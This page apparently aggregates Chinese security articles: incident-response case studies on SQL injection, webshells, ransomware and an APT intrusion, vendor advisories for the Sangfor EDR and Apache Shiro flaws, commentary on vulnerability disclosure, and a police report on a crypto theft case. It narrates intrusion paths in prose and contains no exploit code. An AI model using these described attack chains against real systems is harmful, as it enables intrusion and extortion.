
应急人员在到达现场后,根据天眼SQL注入告警,首先对数据库服务器进行排查,发现该服务器存在大量“powershell.exe”和“mshta.exe”进程。通过对“powershell.exe”进程进行解密,确定该进程为攻击者的远控进程。结合天眼流量分析,确定攻击者于前天晚上3点11分左右,利用SQL注入漏洞,对该服务器进行命令执行攻击。查询服务器用户,发现可疑隐藏账户。对业务服务器进行排查发现有Webshell后门脚本文件“1.aspx”和“index.aspx”。

 

最终确定攻击者利用业务服务器登录处的SQL注入漏洞,进行任意命令执行,并创建隐藏账户、上传后门文件。因该业务服务器和数据库服务器为站库分离设计,故导致业务服务器和数据库服务器均被攻陷。

 

(二) 防护建议

 

1)对用户输入内容进行检查与验证。检查所输入字符串变量的内容,使用白名单,只接受所需的值,拒绝包含二进制数据、转义序列和注释字符的输入内容,限制用户输入内容的大小和数据类型,对输入内容进行强制转换等;

 

2)重要业务系统及核心数据库应设置独立的安全区域,做好区域边界的安全防御工作,严格限制重要区域的访问权限并关闭不必要、不安全的服务;

 

3)禁止重要服务器主动发起外部连接请求,对于需要向外部服务器推送共享数据的,应使用白名单的方式,在出口防火墙加入相关策略,对主动连接IP范围进行限制;

 

4)部署高级威胁监测设备,及时发现恶意网络流量,同时可进一步加强追踪溯源能力,对安全事件发生时可提供可靠的追溯依据;

 

5)建议在服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、防范漏洞利用等方式,提高系统安全基线,防范黑客入侵。

 

四、某国有企业勒索病毒Hermes837事件处置

 

(一)事件概述

 

3月19日,奇安信安服团队接到某国有企业应急响应请求,该企业感染勒索病毒、多个主机文件被加密,要求协助对攻击路径进行溯源。

 

应急人员通过对主机/服务器的进程、文件、日志等排查分析,发现主机审核策略配置存在缺陷,部分审计未开启,系统被植入恶意程序等现象,确认多台机器感染Hermes837勒索病毒,被病毒加密后的文件后缀为“Hermes837”。

 

攻击者利用IPC暴力破解,成功登陆内网主机和办公主机,在办公主机进行安装TeamViewer,创建ProcessHacker服务,修改密码等一系列操作,以内网主机为跳板,在SMB服务器安装恶意程序KProcessHacker 。最终导致多台机器感染Hermes837勒索病毒,文件被加密。

 

(二)防护建议

 

1)系统、应用相关用户杜绝使用弱口令,应使用高复杂强度的密码,加强内部人员安全意识,禁止密码重用的情况出现;

 

2)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞、安装补丁,将信息安全工作常态化;

 

3)建议在服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、禁用或限用危险端口(如3389、445、139、135等)、防范漏洞利用等方式,提高系统安全基线,防范黑客入侵;

 

4)配置并开启相关关键系统、应用日志,对系统日志进行定期异地归档、备份,避免在攻击行为发生时,导致无法对攻击途径、行为进行溯源等,加强安全溯源能力;

 

5)建立安全灾备预案,一旦核心系统遭受攻击,需要确保备份业务系统可以立即启用;同时,需要做好备份系统与主系统的安全隔离工作,避免主系统和备份系统同时被攻击,影响业务连续性。

 

五、某科技公司海莲花APT事件处置

 

(一)事件概述

 

3月5日,奇安信安服团队接到某科技公司应急响应请求,现场疑似内网受到海莲花APT攻击,请求溯源和应急处置。

 

应急人员到达现场后发现该公司所使用的云桌面目录下存在恶意木马DLL文件,通过大量日志分析发现存在海外IP登陆记录,该海外IP经奇安信红雨滴实验室分析确认,属于海莲花常用的跳板机IP,确认该公司受到了海莲花APT攻击。通过流量分析找到最先入侵的机器A,并且此机器上存在卫星系统相关服务器的SSH登陆用户名及密码,可以成功登陆B服务器。

 

最终确认攻击途径,由于该公司员工云桌面账号密码外泄,攻击者利用信息收集,成功从海外控制机器A,又因机器A无法上网,且存有B服务器的SSH登陆用户名及密码,以B服务器作为跳板进行端口转发,实现机器A的对外上线。最后将这两台机器作为跳板,对卫星系统机器进行攻击。

 

(二)防护建议

 

1)禁止服务器主动发起外部连接请求,对于需要向外部服务器推送共享数据的,应使用白名单的方式,在出口防火墙加入相关策略,对主动连接IP范围进行限制;

 

2)定期进行内部人员安全意识培养,增强内部人员密码管理意识,禁止将密码进行本地保存,禁止将敏感信息私自暴露至公网等;

 

3)部署高级威胁监测设备,及时发现恶意网络流量,同时可进一步加强追踪溯源能力,对安全事件发生时可提供可靠的追溯依据;

 

4)有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,其他端口一律禁止访问,仅管理员IP可对管理端口进行访问,如FTP、数据库服务、远程桌面等管理端口;

 

5)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞、安装补丁,将信息安全工作常态化。

 

5、医疗卫生行业分析专题

 

上半年,医疗卫生行业的网络安全问题直接影响到抗疫工作的顺利展开,在半年报告中,我们特别针对医疗卫生行业的应急响应状况进行了专题分析。

 

一、月度分布分析

 

上半年,医疗卫生行业的应急响应救援服务共59起,占到上半年全部应急事件的16.1%。3月、5月医疗卫生行业应急次数较多,分别占上半年医疗卫生行业应急总数的22.0%、28.8%。

 

《2020年上半年网络安全应急响应分析报告》全文

 

二、事件发现分析

 

在上半年医疗卫生行业相关的网络安全应急事件中,自行发现的安全攻击事件占94.9%,其中有52.5%安全事件是在遭到攻击者勒索后后知后觉;另有5.1%的安全攻击事件是通过监管机构及第三方平台通报得知。

 

《2020年上半年网络安全应急响应分析报告》全文

 

三、影响范围分析

 

上半年,医疗卫生行业相关的网络安全应急事件的影响范围主要集中在业务专网66.1%、办公终端33.9%。在受影响的设备中,办公终端有415台,服务器有239台。

 

《2020年上半年网络安全应急响应分析报告》全文

 

四、攻击影响分析

 

上半年,针对医疗卫生行业被攻陷所造成影响的数据分析发现,造成系统、网络不可用和数据丢失事件较多。其中,导致系统/网络不可用安全事件占比32.2%;导致数据丢失占比28.8%,其次为数据被篡改、生产效率低下、数据泄露等不良影响。

 

《2020年上半年网络安全应急响应分析报告》全文

 

五、攻击意图分析

 

上半年,攻击者针对医疗卫生行业的攻击意图主要是敲诈勒索,牟取暴利。

 

《2020年上半年网络安全应急响应分析报告》全文

 

六、攻击类型分析

 

上半年,医疗卫生行业应急响应处置事件中常见的攻击类型主要是恶意程序61.0%、漏洞利用30.5%、钓鱼邮件3.4%,其次为拒绝服务攻击和网络监听攻击。

 

《2020年上半年网络安全应急响应分析报告》全文

 

七、恶意程序分析

 

在上半年医疗卫生行业安全事件中,最常见的恶意程序是勒索病毒70.2%、挖矿木马10.6%以及一般木马8.5%。其中勒索病毒多以GlobeImposter勒索病毒及其变种病毒较多。

 

《2020年上半年网络安全应急响应分析报告》全文

 

八、漏洞利用分析

 

在上半年的医疗卫生行业应急响应处理漏洞利用攻击事件中,弱口令占比59.3%、永恒之蓝占比24.0%、服务器漏洞占比9.3%。

 

《2020年上半年网络安全应急响应分析报告》全文

 

九、医疗行业应急典型案例

 

案例一:某市医药公司OA系统失陷,造成数据泄露

 

事件概述

 

3月11日,奇安信安服团队接到某市医药公司应急请求,公司DMZ服务器区出口地址存在外连行为。

 

应急人员排查分析,发现对外攻击的IP为该公司内网OA系统的出口地址,因OA系统供应商要求对系统进行远程维护,特将OA服务器的3389端口映射到出口地址的3389端口。通过对IPS、负载均衡、防火墙以及服务器系统日志进行分析排查,发现内网OA系统存在多个地区和国家的IP通过3389端口远程登录记录和木马文件。对OA服务器系统部署文件进行排查,发现此服务器存在任意文件写入漏洞,并且发现两个Webshell后门。

 

经分析研判最终确定,攻击者通过内网OA系统映射在公网的3389端口进行远程登录,并上传Webshell后门1,用于执行系统命令;利用OA系统任意文件写入漏洞,上传Webshell后门2,用于上传任意文件,写入恶意木马文件,对外网发起异常连接,进行数据传输。

 

防护建议

 

1)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞、安装补丁,将信息安全工作常态化;

 

2)加强设备权限管理,对敏感目录进行权限设置,限制上传目录的脚本执行权限,不允许配置执行权限等;

 

3)建议在服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、禁用或限用危险端口(如3389、445、139、135等)、防范漏洞利用等方式,提高系统安全基线,防范黑客入侵;

 

4)禁止服务器主动发起外部连接请求,对于需要向外部服务器推送共享数据的,应使用白名单的方式,在出口防火墙加入相关策略,对主动连接IP范围进行限制;

 

5)建议安装相应的防病毒软件,及时对病毒库进行更新,并且定期进行全面扫描,加强服务器上的病毒清除能力。

 

案例二:某省三甲医院感染Crysis勒索病毒事件

 

事件概述

 

2月,奇安信安服团队接到某省三甲医院应急请求,多台服务器文件被勒索病毒加密,业务无法正常运行,请求溯源和应急处置。

 

应急人员对该医院被感染的服务器进行排查分析,判断医院主机服务器感染了Crysis勒索病毒,且发现该医院多台服务器防病毒软件授权已到期。进一步排查发现服务器A对外网开放了远程桌面服务,同时在内网多台主机和服务器中发现了RDP爆破痕迹,且除服务器A外,内网中其他多台主机和服务器RDP服务登录密码均为弱口令。

 

经排查研判后最终确定,攻击者利用服务器A远程桌面服务暴露在外网和弱口令的弱点进行了暴力破解,并成功获取服务器A控制权,进而以服务器A作为跳板,对位于内网中的服务器B进行RDP弱口令爆破,爆破成功后,利用服务器B对内网中其他主机进行爆破并手动投放Crysis勒索病毒横向扩散。

 

防护建议

 

1)系统、应用相关用户杜绝使用弱口令,应使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,加强管理员安全意识,禁止密码重用的情况出现;

 

2)建议安装相应的防病毒软件,及时对病毒库进行更新,并且定期进行全面扫描,加强服务器上的病毒清除能力;

 

3)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞、安装补丁,将信息安全工作常态化;

 

4)建议在服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、禁用或限用危险端口(如3389、445、139、135等)、防范漏洞利用等方式,提高系统安全基线,防范黑客入侵;

 

5)建立安全灾备预案,一旦核心系统遭受攻击,需要确保备份业务系统可以立即启用;同时,需要做好备份系统与主系统的安全隔离工作,避免主系统和备份系统同时被攻击,影响业务连续性。

 

案例三:某市华侨医院网站存在任意文件上传漏洞,导致多台主机沦陷

 

事件概述

 

3月23日,奇安信安服团队接到某市华侨医院应急请求,医院服务器被入侵。

 

应急响应人员通过网站的安全性检测以及系统日志分析发现,网站http://xxx:999存在任意文件上传漏洞,同时发现内网多台主机存在MS17-010漏洞,并且存在被暴力破解的记录。

 

最终通过对系统的检查和分析确定,攻击者首先对网站http://xxx:999进行访问,在该网站中发现了任意文件上传漏洞,并对其进行利用,通过上传ASP类型的Webshell获取了服务器的管理员权限,进而以该沦陷服务器为跳板机,利用内网多台主机中存在的MS17-010漏洞、RDP弱口令等对其进行攻击,导致多台内网终端沦陷。

 

防护建议

 

1)系统、应用相关用户杜绝使用弱口令,应使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,加强管理员安全意识,禁止密码重用的情况出现;

 

2)对系统文件上传功能,采用白名单上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则;

 

3)加强权限管理,对敏感目录进行权限设置,限制上传目录的脚本执行权限,不允许配置执行权限等;

 

4)建议对内网服务器及主机开展安全大检查,检查的范围包括但不限于系统漏洞检测(如MS17-010漏洞、任意文件上传漏洞等)、后门检测,并及时进行漏洞修复、补丁安装、后门清理等工作;

 

5)加强日常安全巡检制度,定期对系统配置、网络设备配合、安全日志以及安全策略落实情况进行检查,常态化信息安全工作。

原文始发于微信公众号(计算机与网络安全):《2020年上半年网络安全应急响应分析报告》全文

关于这两天网安圈热议的那事儿,闲话几句

微慑管理员阅读(1850)

 

 

我向来喜欢直入主题。关于最近某服EDR的远程代码执行漏洞事件,通过漏洞能直接控制远程服务器,有些同学还通过安装包分析了其他一些漏洞,详细的描述我就不赘述了。整个事件在圈子里引发了不少的讨论。

针对这件事,我想发表一些个人的看法。

 

关于这两天网安圈热议的那事儿,闲话几句

首先,某服真的需要加大对产品本身安全性的投入。从代码本身的实现来说,这份代码确实写的不怎么样,甚至可以说很不怎么样。换位思考,如果这些代码是我自己来写,很多低级错误是可以避免的,但是真的能做到万无一失吗?尤其是在时间很紧的情况下,坦白说我也很难保证。网络安全产品本身是一种产品,既然是产品,就会在开发过程中权衡收益和投入,安全产品也是人写出来的,如果时间不够,或者审查机制不完善,很多常见的错误自然就会留在代码中打包推向市场。最近也看到腾讯玄武实验室负责人于旸(TK)在朋友圈里说:“安全是成本。无论什么行业,在生产成本上自然能省则省。所以安全产品的安全性不会和同一监管环境下的其它产品有太大不同。在大多数企业的内部机制设计中,检测自家产品的安全都是吃力不讨好的事情。”这也是某服需要多考虑和投入的地方,长期而稳定的投入才能提升产品自身的安全性。

能在安装包看到代码并非源码泄漏,但是可以做的更好。这次流传的某服EDR事件中,还提到了源码泄漏,这听起来感觉很严重,但是内行人都知道,在安装包里面找到了一些PHP代码,这并不是源码泄漏,这些代码本来就该在安装包里面。从架构来说安装包里面有代码是很正常的事情。大型系统基本都是核心模块加上一些脚本来实现,核心模块负责大部分逻辑,然后脚本负责上层业务,由于脚本是解释执行的,基本不编译成二进制,所以就会出现打开安装包看到代码的情况。就我所接触的大部分类似产品的安装包都带有源码,例如卡巴斯基等等,解开他们的安装包都能看到一些脚本有的是Python,有的是Shell。不过某服确实需要把这件事更进一步做好,例如可以把安装包里面的代码混淆一下,虽然这样做并不能阻止有心人分析,但是确实可以增加破解的难度。

安全从业者维护安全的初心是好的,但是也要做到依法披露漏洞,学会保护自己。某服的这个漏洞这么快就被披露了出来,也确实让人震惊,根据《网络安全漏洞管理规定》的规定,第三方组织或者个人不得在网络产品、服务提供者和网络运营者向社会或用户发布漏洞修补或防范措施之前发布相关漏洞信息,而且不得提供乘人之危的方法、程序和工具。一般情况下,当发现一个漏洞之后,可以先上报到国家信息安全漏洞共享平台(China National Vulnerability Database,英文简称“CNVD”),厂商在90/10天内修复,厂商采取漏洞修补或防范措施后再批露漏洞的细节以供同行们学习和借鉴,这样也能最大程度的保护用户的数据安全,毕竟不管是哪个厂商,其使命是一致的,那就是维护用户的网络安全。但是现在这样直接把问题细节通过非正常流程公开,破坏了行业规则的同时,其实也是有法律风险的。为什么说是风险,是因为刚才提到的漏洞管理规定还只是征求意见稿,但是如果真的因为披露了漏洞带来了较大的社会影响时,相信谁都不愿意为此被请到局里去喝杯茶吧?我们还是要依法披露漏洞,保护好自己。而且一旦行业规则和法律没有得到遵守,真正发生危险的时候,我们这些从业者很难真正的保护到用户,很难真正御敌于国门之外。

 

关于这两天网安圈热议的那事儿,闲话几句

 

安在有话说:

圈内这两天很是热闹,大多是因为某些被广泛部署的网络安全设备存在0day漏洞,并引发了大量的讨论。其实这算是个老话题了:网络安全设备是保安全的,可网络安全设备自身如果不安全呢?或者,厂商如何保证自己提供的网络安全设备就是可靠的、安全的呢?这事儿以往有争议,但也仅仅停留在争议层面,一来企业用户多不关注,二来网安厂商也不置可否,看起来,有点“灯下黑”或“灰色地带”的意思了。某种意义上说,某网行动真的功莫大焉,至少把许多我们应该面对以前却有意无意忽略掉的问题重新摆在了大家面前。其实,不管是企业用户,还是网安厂商,也不管是业务系统,还是安全设备,都是软件+硬件+操作,也都必然会存在所谓的漏洞,问题不在于此,而在于如何不留死角去审视,以及一视同仁去应对。当然,很多时候,旁观者未必清,当局者也未必迷,只是这些问题是整个行业所关注的问题,因此需要广开言路,多倾听各方的声音,多探索安全行业的发展和秩序。

 

今天这篇文章是一位行业资深人士的投稿,不代表安在立场和观点,我们作为中立的平台,只想让相关各方都能阐述观点,不管什么角色,都在网安圈,推动网安产业发展才是我们共同关注和使命。

 

 

关于这两天网安圈热议的那事儿,闲话几句

点【在看】的人最好看

关于这两天网安圈热议的那事儿,闲话几句

原文始发于微信公众号(安在):关于这两天网安圈热议的那事儿,闲话几句

涉案 3000 余万!苏州破获虚拟货币黑客案

微慑管理员阅读(1552)

日前,苏州园区警方通过缜密侦查,循线追踪,成功侦破苏州首起针对虚拟货币的黑客犯罪案件,抓获多名专门利用黑客手段盗取账户密码、窃取虚拟货币,通过暗网联系职业洗钱销赃团伙变现的犯罪嫌疑人,涉案金额高达 3000 余万元。

” 警察同志,有人盗取了我的虚拟货币。” 不久前,郑女士(化名)至苏州工业园区公安分局报案称:其拥有的价值 100 余万元的虚拟货币被盗。接报后,园区公安分局高度重视,立即汇同苏州市公安局网安支队成立专案组,对该案件进行侦查。

通过对被盗虚拟货币走向进行梳理,专案组民警深挖细查,经过不懈努力,成功锁定了一个藏匿于云南昆明、广东广州的家族式洗币团伙,并先后远赴云南、广东,成功打掉了一个专门负责转移黑客手段窃取来的虚拟货币团伙,抓获以姚某为首的 4 名洗币嫌疑人。

​【安全圈】涉案 3000 余万!苏州破获虚拟货币黑客案

△民警(左)在进行搜查 苏州园区警方供图

归案后,经对姚某等嫌疑人的审讯,专案组民警发现,姚某就是黑客团伙联络人。民警继续对直接窃取虚拟币的黑客团伙展开追查。然而,作案的黑客团伙在听到消息后销声匿迹了。不抛弃不放弃,民警紧盯该案循线侦办,经过大量的研判追踪,从纷繁复杂的网络线索中发现了利用黑客手段盗窃虚拟货币的犯罪嫌疑人线索。该团伙两名犯罪嫌疑人宁某、陈某均为某网络科技公司前工程师,技术水平高、犯罪手段隐秘。

在充分查明两名嫌疑人落脚点及生活、作案规律之后,专案组民警远赴福建厦门、福州两地,分别抓获两名黑客犯罪嫌疑人宁某、陈某,查获涉案资金 3000 余万元。在大量的证据面前,两名黑客对犯罪事实供认不讳。

据悉,犯罪嫌疑人宁某曾在某网络科技公司从事计算机信息安全方面的工作。工作期间通过社交论坛了解到一些专业人员利用企业网络漏洞进行攻击以窃取巨额网络资产的 ” 成功 ” 案例,这令他心动万分。辞职后,宁某利用专业优势,打起了侵占他人网络资产的念头。但苦于没有目标公司的网络地址,一直未行动。

后来,宁某通过社交软件结识了合作的姚某,通过姚某的 ” 牵线搭桥 “,宁某锁定了目标,挨个儿地寻找网络漏洞,实施渗透入侵,借此来获取相关程序的管理权限,以便操作实施资产转移。在面对一些较难入侵的系统时,宁某想到了专业能力更强的前同事陈某,在他的利诱之下,利欲熏心的陈某同意入伙,一同参与违法犯罪活动。短短数月,仅两名黑客就获利 3000 余万元。

就在宁某赚得盆满钵满之际,姚某被抓的消息传了过来,看到形势不妙,妄图摆脱嫌疑的陈某立即联系了宁某,还丢弃手机、电脑,想要暂避风头,借此躲避公安机关追捕。然而法网恢恢,疏而不漏,等待他们的将是法律的严惩。

现代快报记者了解到,目前,园区警方已对宁某、陈某等黑客嫌疑人以及姚某等嫌疑人采取刑事强制措施,案件仍在进一步调查中。

在此,园区警方提示,在处理网络财产的电脑或手机上,切记不要轻易点击来历不明的链接,或者下载路径不明的软件,对相关查杀软件要经常更新和升级,定期对后台进行安全更新维护,尽量多设置 ” 网络密钥 “,最大程度增加黑客攻击的成本和难度,也最大限度保障自身财产权益不受侵害。

原文始发于微信公众号(安全圈):​【安全圈】涉案 3000 余万!苏州破获虚拟货币黑客案

关于深信服EDR远程命令执行漏洞的说明

微慑管理员阅读(2618)

公告丨关于深信服EDR远程命令执行漏洞的说明

2020年8月18日,国家信息安全漏洞共享平台(CNVD)收录了深信服终端检测响应平台(EDR)远程命令执行漏洞(CNVD-2020-46552)。攻击者利用该漏洞可远程执行系统命令,获得目标服务器的权限。经验证,此问题在EDR v3.2.21版本已修复,深信服EDR用户升级到v3.2.21版本或升级补丁包即可修复漏洞。

一、漏洞情况分析

攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。

二、漏洞影响范围

经验证,受此漏洞影响的版本仅包括EDR v3.2.16、v3.2.17和v3.2.19,EDR其他版本(包括最新的v3.2.21版本)不受此漏洞影响。

三、漏洞处置建议

目前,深信服已经发布升级版本和补丁,更新至v3.2.21版本或升级补丁即可修复该问题并增强其他安全机制。

1、深信服已通过在线升级方式推送补丁包修复该漏洞,开启在线升级功能可自动修复该漏洞。

2、针对无法在线升级的用户,深信服技术服务人员将主动协助用户完成EDR版本升级或补丁修复工作。同时,用户可通过以下链接下载升级安装包来完成EDR的升级工作:

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

下载升级安装包后打开EDR管理平台,在系统管理–升级管理–平台和终端升级界面中导入该升级安装包,导入后管理平台和终端将自动升级至v3.2.21版本。

深信服建议使用深信服EDR的用户及时自查,并按照漏洞处置建议及时进行加固处置。如修复过程中有任何问题,可联系深信服服务热线:400-630-6430获取技术支持。

对上述漏洞给相关用户带来的困扰,我们深表歉意!深信服将加大自身产品安全性研发投入,改善管理,进一步提升产品的安全性,尽量降低漏洞产生概率;同时,我们将全情投入地持续改进和优化,尽力为用户提供更优质的产品和服务。

CNVD公告详情链接:

https://www.cnvd.org.cn/webinfo/show/5677

原文始发于微信公众号(深信服技术服务):公告丨关于深信服EDR远程命令执行漏洞的说明

Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

微慑管理员阅读(3647)

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

2020年8月18日,奇安信CERT监测到Apache Shiro官方发布安全通告  Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。鉴于该漏洞影响较大,建议客户尽快升级到最新版本。

 

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

奇安信 CERT

漏洞描述

Apache Shiro是一个强大且易用的Java安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用Shiro的易用API,您可以快速、轻松地保护任何应用程序——从最小的移动应用程序到最大的WEB和企业应用程序。

 

2020年8月18日,奇安信CERT监测到Apache Shiro官方发布安全通告  Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。鉴于该漏洞影响较大,建议客户尽快升级到最新版本。

 

奇安信CERT第一时间复现了CVE-2020-13933漏洞,复现截图如下:

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

风险等级

奇安信 CERT风险评级为:高危

风险等级:蓝色(一般事件)

影响范围

 

Apache Shiro < 1.6.0

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

处置建议

 

更新至最新版本:http://shiro.apache.org/download.html

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

产品线解决方案

奇安信开源卫士产品防护方案

奇安信开源卫士通过更新到20200818. 390版本,支持对Apache Shiro身份验证绕过漏洞的检测。

奇安信网站应用安全云防护系统已更新防护特征库

奇安信网神网站应用安全云防护系统已全局更新所有云端防护节点的防护规则,支持Apache Shiro身份验证绕过漏洞(CVE-2020-13933)的防护。

奇安信网神天堤防火墙产品防护方案

奇安信新一代智慧防火墙(NSG3000/5000/7000/9000系列)和下一代极速防火墙(NSG3500/5500/7500/9500系列)产品系列,已通过更新IPS特征库完成了对该漏洞的防护。建议用户尽快将IPS特征库升级至” 2008181200” 及以上版本并启用规则ID: 1215901进行检测。

奇安信网神统一服务器安全管理平台更新入侵防御规则库

奇安信网神虚拟化安全轻代理版本可通过更新入侵防御规则库2020.08.18版本,支持对Apache Shiro身份验证绕过漏洞(CVE-2020-13933)的防护,当前规则正在测试中,将于8月18日发布,届时请用户联系技术支持人员获取规则升级包对轻代理版本进行升级。

奇安信网神统一服务器安全管理平台可通过更新入侵防御规则库10284版本,支持对Apache Shiro身份验证绕过漏洞(CVE-2020-13933)的防护,当前规则正在测试中,将于8月18日发布,届时请用户联系技术支持人员获取规则升级包对融合版本进行升级。

奇安信天眼产品解决方案

奇安信天眼新一代安全感知系统在第一时间加入了该漏洞的检测规则,请将规则包升级到3.0.0818. 12229及以上版本。规则名称:Apache Shiro身份验证绕过漏洞,规则ID:0x100209C5。奇安信天眼流量探针(传感器)升级方法:系统配置->设备升级->规则升级,选择“网络升级”或“本地升级”。

奇安信网神云锁产品解决方案

奇安信网神云锁产品(私有云版/公有云版)可通过更新网站漏洞防御规则支持对Apache Shiro身份验证绕过漏洞(CVE-2020-13933)的防御,请用户联系技术支持人员获取防护规则。

奇安信网神网络数据传感器系统产品检测方案

奇安信网神网络数据传感器(NDS3000/5000/9000系列)产品,已具备该漏洞的检测能力。规则ID为:5832,建议用户尽快升级检测规则库至2008181600以后版本并启用该检测规则。

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

参考资料

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13933

[2] https://shiro.apache.org/security-reports.html

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

时间线
2020年8月18日,奇安信 CERT发布安全风险通告
 
奇安信 CERT
 

奇安信CERT致力

一时间为企业级客户提供

安全风险通告和有效的解决方案

【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

 

原文始发于微信公众号(奇安信 CERT):【安全风险通告】Shiro又爆高危漏洞,Apache Shiro身份验证绕过漏洞安全风险通告

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

登录

找回密码

注册